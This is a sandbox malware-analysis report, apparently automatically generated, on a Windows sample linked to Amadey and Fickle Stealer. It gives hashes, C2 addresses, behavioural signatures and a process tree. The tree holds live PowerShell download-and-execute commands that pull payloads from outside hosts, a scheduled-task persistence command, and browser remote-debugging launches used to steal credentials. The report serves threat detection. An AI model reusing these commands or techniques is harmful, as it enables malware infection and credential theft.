Analysis

  • max time kernel
    105s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 22:15

General

  • Target

    2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    b7430c558badc33b5b014196e0ca7ae9

  • SHA1

    fdc4ee812635e62fbece09d92cbe8e9b5c64be41

  • SHA256

    4fca71c67716c65a8500227d5e3ae2b4488cb85279d386b599005857d1d4ba05

  • SHA512

    82531af4a056288c3ed12f4dec12dad99166b880be526380274ee27882413dfd7cf832c551a0eb6ebf9ea9b7ba1aa224166096834ef51db1a41d0de9ff812512

  • SSDEEP

    24576:UqDEvCTbMWu7rQYlBQcBiT6rprG8a08u:UTvC/MTQYxsWR7a08

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Blocklisted process makes network request 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 2 IoCs
  • Uses browser remote debugging 2 TTPs 16 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 46 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-06_b7430c558badc33b5b014196e0ca7ae9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn vgBjHmaINPI /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZD8bnBbHA.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3568
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn vgBjHmaINPI /tr "mshta C:\Users\Admin\AppData\Local\Temp\ZD8bnBbHA.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1440
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\ZD8bnBbHA.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5704
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Users\Admin\AppData\Local\TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE
          "C:\Users\Admin\AppData\Local\TempLTNRGBWJWCUFDTQMN8QW5ZVWZG6UC7DP.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1260
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10479800141\pDmELXs.ps1"
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5628
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -win Hidden -Command "Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://client-telemetry.com/hH773j/payload/fickle/payload.ps1')))"
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3372
                • C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe
                  "C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2496
                  • C:\Windows\system32\taskkill.exe
                    taskkill /F /IM chrome.exe
                    9⤵
                    • Kills process with taskkill
                    PID:1256
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
                    9⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:5588
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9de28dcf8,0x7ff9de28dd04,0x7ff9de28dd10
                      10⤵
                        PID:5132
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
                        10⤵
                          PID:4500
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2236,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2232 /prefetch:3
                          10⤵
                            PID:1880
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2344,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2340 /prefetch:8
                            10⤵
                              PID:2820
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3208 /prefetch:1
                              10⤵
                              • Uses browser remote debugging
                              PID:4512
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:1
                              10⤵
                              • Uses browser remote debugging
                              PID:1124
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4248 /prefetch:2
                              10⤵
                              • Uses browser remote debugging
                              PID:4768
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,17887973274031549053,4557818641347015986,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4592 /prefetch:1
                              10⤵
                              • Uses browser remote debugging
                              PID:5028
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM chrome.exe
                            9⤵
                            • Kills process with taskkill
                            PID:2224
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM msedge.exe
                            9⤵
                            • Kills process with taskkill
                            PID:4004
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
                            9⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:3260
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x300,0x7ff9dae1f208,0x7ff9dae1f214,0x7ff9dae1f220
                              10⤵
                                PID:1208
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2644,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:3
                                10⤵
                                  PID:5312
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2592,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:2
                                  10⤵
                                    PID:5180
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2716,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2708 /prefetch:8
                                    10⤵
                                      PID:6096
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
                                      10⤵
                                      • Uses browser remote debugging
                                      PID:4568
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3556,i,4990305468293964105,5838536694120044613,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
                                      10⤵
                                      • Uses browser remote debugging
                                      PID:2592
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /F /IM msedge.exe
                                    9⤵
                                    • Kills process with taskkill
                                    PID:5752
                            • C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe
                              "C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:628
                              • C:\Users\Admin\AppData\Local\Temp\onefile_628_133884513523412558\ZSoeRVBe.exe
                                C:\Users\Admin\AppData\Local\Temp\10479900101\CmvdYC4.exe
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1208
                            • C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
                              "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
                              6⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of SetThreadContext
                              PID:1244
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zatv23mb\zatv23mb.cmdline"
                                7⤵
                                  PID:4960
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF73.tmp" "c:\Users\Admin\AppData\Local\Temp\zatv23mb\CSC26A8B6CF163F4042BC29EF8329E3C758.TMP"
                                    8⤵
                                      PID:3020
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                    7⤵
                                    • Accesses Microsoft Outlook accounts
                                    • Accesses Microsoft Outlook profiles
                                    • Suspicious use of SetThreadContext
                                    • Drops file in Program Files directory
                                    • System Location Discovery: System Language Discovery
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • outlook_office_path
                                    • outlook_win_path
                                    PID:4708
                                    • C:\Windows\system32\rundll32.exe
                                      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                      8⤵
                                      • Modifies registry class
                                      • Suspicious use of FindShellTrayWindow
                                      PID:2592
                                    • C:\Windows\system32\rundll32.exe
                                      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                      8⤵
                                      • Modifies registry class
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5192
                                    • C:\Windows\system32\rundll32.exe
                                      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                      8⤵
                                        PID:1524
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:1224
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e101dcf8,0x7ff9e101dd04,0x7ff9e101dd10
                                          9⤵
                                            PID:3792
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2568,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2564 /prefetch:3
                                            9⤵
                                              PID:3452
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2536,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2528 /prefetch:2
                                              9⤵
                                                PID:2036
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2584,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2576 /prefetch:8
                                                9⤵
                                                  PID:3952
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3136 /prefetch:1
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:6104
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3404,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3400 /prefetch:1
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:3680
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4068,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4064 /prefetch:2
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:3436
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4604,i,15727445684611582999,2238538521242380415,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4600 /prefetch:1
                                                  9⤵
                                                  • Uses browser remote debugging
                                                  PID:2088
                                              • C:\Windows\system32\rundll32.exe
                                                "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                                                8⤵
                                                  PID:3368
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
                                                  8⤵
                                                  • Uses browser remote debugging
                                                  PID:3480
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x20c,0x23c,0x240,0x208,0x2f0,0x7ff9dd79f208,0x7ff9dd79f214,0x7ff9dd79f220
                                                    9⤵
                                                      PID:1728
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2764,i,657909540547836991,14887086765475164535,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2760 /prefetch:3
                                                      9⤵
                                                        PID:4472
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
